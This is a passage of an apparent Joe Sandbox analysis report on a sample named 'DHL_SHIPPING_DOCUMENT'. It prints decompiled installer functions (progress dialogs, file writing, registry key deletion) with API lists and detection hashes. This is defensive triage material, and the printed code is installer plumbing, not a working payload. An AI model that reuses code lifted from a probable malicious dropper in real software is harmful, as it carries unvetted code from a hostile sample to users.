					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                              0x004068f1
                                                              0x004068fa
                                                              0x00406911
                                                              0x00406911
                                                              0x00406918
                                                              0x00406924
                                                              0x00406924
                                                              0x00406927
                                                              0x0040692a
                                                              0x0040692f
                                                              0x00406931
                                                              0x0040693a
                                                              0x0040693e
                                                              0x0040695b
                                                              0x00406963
                                                              0x00406963
                                                              0x00406968
                                                              0x0040696a
                                                              0x0040696d
                                                              0x00406972
                                                              0x00406973
                                                              0x00406977
                                                              0x00406977
                                                              0x00406978
                                                              0x0040697f
                                                              0x00406981
                                                              0x00406988
                                                              0x00000000
                                                              0x00000000
                                                              0x00406990
                                                              0x00406996
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406996
                                                              0x0040699b

                                                              APIs
                                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                              • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                              • CharNextW.USER32(?,00000000,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                              • CharPrevW.USER32(?,?,7476FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Char$Next$Prev
                                                              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 589700163-4010320282
                                                              • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                              • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                              • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                              • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                                                              0x0040303d
                                                              0x0040303f
                                                              0x00403046
                                                              0x00403049
                                                              0x00403049
                                                              0x0040304f
                                                              0x00000000
                                                              0x0040304f
                                                              0x0040305d
                                                              0x00000000
                                                              0x00403060
                                                              0x00403067
                                                              0x00403073
                                                              0x0040307b
                                                              0x004030b9
                                                              0x004030c2
                                                              0x00000000
                                                              0x004030c7
                                                              0x00403084
                                                              0x00403095
                                                              0x00000000
                                                              0x004030a3
                                                              0x00403084
                                                              0x004030cf

                                                              APIs
                                                              • DestroyWindow.USER32(?,00000000), ref: 00403049
                                                              • GetTickCount.KERNEL32 ref: 00403067
                                                              • wsprintfW.USER32 ref: 00403095
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                              • CreateDialogParamW.USER32 ref: 004030B9
                                                              • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                                • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                              • String ID: ... %d%%
                                                              • API String ID: 722711167-2449383134
                                                              • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                              • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                              • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                                                              • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                              0x00404f8d
                                                              0x00404f9a
                                                              0x00404fa0
                                                              0x00404fde
                                                              0x00404fde
                                                              0x00404fed
                                                              0x00404ff4
                                                              0x00000000
                                                              0x00404ff6
                                                              0x00404fa2
                                                              0x00404fb1
                                                              0x00404fb9
                                                              0x00404fbc
                                                              0x00404fce
                                                              0x00404fd4
                                                              0x00404fdb
                                                              0x00000000
                                                              0x00404fdb
                                                              0x00000000

                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                              • GetMessagePos.USER32 ref: 00404FA2
                                                              • ScreenToClient.USER32 ref: 00404FBC
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Message$Send$ClientScreen
                                                              • String ID: f
                                                              • API String ID: 41195575-1993550816
                                                              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                              • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                              • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                              0x00402fa3
                                                              0x00402fb1
                                                              0x00402fb7
                                                              0x00402fb7
                                                              0x00402fc5
                                                              0x00402fc7
                                                              0x00402fd3
                                                              0x00402fd8
                                                              0x00402fda
                                                              0x00402fda
                                                              0x00402fe5
                                                              0x00402ff5
                                                              0x00403007
                                                              0x00403007
                                                              0x0040300f

                                                              APIs
                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                              • wsprintfW.USER32 ref: 00402FE5
                                                              • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                              • SetDlgItemTextW.USER32 ref: 00403007
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                              • API String ID: 1451636040-1158693248
                                                              • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                              • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                              • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                              • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                              0x00402950
                                                              0x00402952
                                                              0x00402957
                                                              0x0040295c
                                                              0x0040295f
                                                              0x00402969
                                                              0x0040296d
                                                              0x0040296d
                                                              0x00402973
                                                              0x00402980
                                                              0x00402988
                                                              0x0040298b
                                                              0x00402997
                                                              0x0040299a
                                                              0x004029a0
                                                              0x004029ae
                                                              0x004029b3
                                                              0x004029b7
                                                              0x004029ba
                                                              0x004029c3
                                                              0x004029cf
                                                              0x004029d3
                                                              0x004029d6
                                                              0x004029e0
                                                              0x004029ff
                                                              0x004029e7
                                                              0x004029ec
                                                              0x004029f4
                                                              0x004029f7
                                                              0x004029fc
                                                              0x004029fc
                                                              0x00402a06
                                                              0x00402a06
                                                              0x00402a13
                                                              0x00402a19
                                                              0x00402a1f
                                                              0x00402a1f
                                                              0x004029b7
                                                              0x00402a33
                                                              0x00402a35
                                                              0x00402a35
                                                              0x00402a3f
                                                              0x00402a40
                                                              0x00402a44
                                                              0x00402a48
                                                              0x00402a4e
                                                              0x00402a4e
                                                              0x00402a55
                                                              0x004022f1
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                              • GlobalFree.KERNEL32 ref: 00402A06
                                                              • GlobalFree.KERNEL32 ref: 00402A19
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                              • String ID:
                                                              • API String ID: 2667972263-0
                                                              • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                              • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                              • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                              • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                                              0x00404e7a
                                                              0x00404e7f
                                                              0x00404e87
                                                              0x00404e88
                                                              0x00404e95
                                                              0x00404e9d
                                                              0x00404e9e
                                                              0x00404ea0
                                                              0x00404ea2
                                                              0x00404ea4
                                                              0x00404ea7
                                                              0x00404ea7
                                                              0x00404eae
                                                              0x00404eb4
                                                              0x00404eb4
                                                              0x00404ebb
                                                              0x00404ec2
                                                              0x00404ec5
                                                              0x00404ec8
                                                              0x00404ec8
                                                              0x00404ecc
                                                              0x00404edc
                                                              0x00404ede
                                                              0x00404ee1
                                                              0x00404e8a
                                                              0x00404e8a
                                                              0x00404e91
                                                              0x00404e91
                                                              0x00404ee9
                                                              0x00404ef4
                                                              0x00404f0a
                                                              0x00404f1b
                                                              0x00404f37

                                                              APIs
                                                              • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                              • wsprintfW.USER32 ref: 00404F1B
                                                              • SetDlgItemTextW.USER32 ref: 00404F2E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: ItemTextlstrlenwsprintf
                                                              • String ID: %u.%u%s%s$H7B
                                                              • API String ID: 3540041739-107966168
                                                              • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                              • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                                              • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                                              • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 48%
                                                              			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                              0x00402eb4
                                                              0x00402ebd
                                                              0x00402ec6
                                                              0x00402ed2
                                                              0x00402edb
                                                              0x00402ee5
                                                              0x00402f0a
                                                              0x00402f10
                                                              0x00402f15
                                                              0x00402f16
                                                              0x00402f46
                                                              0x00402f1f
                                                              0x00402f21
                                                              0x00402f71
                                                              0x00402f74
                                                              0x00000000
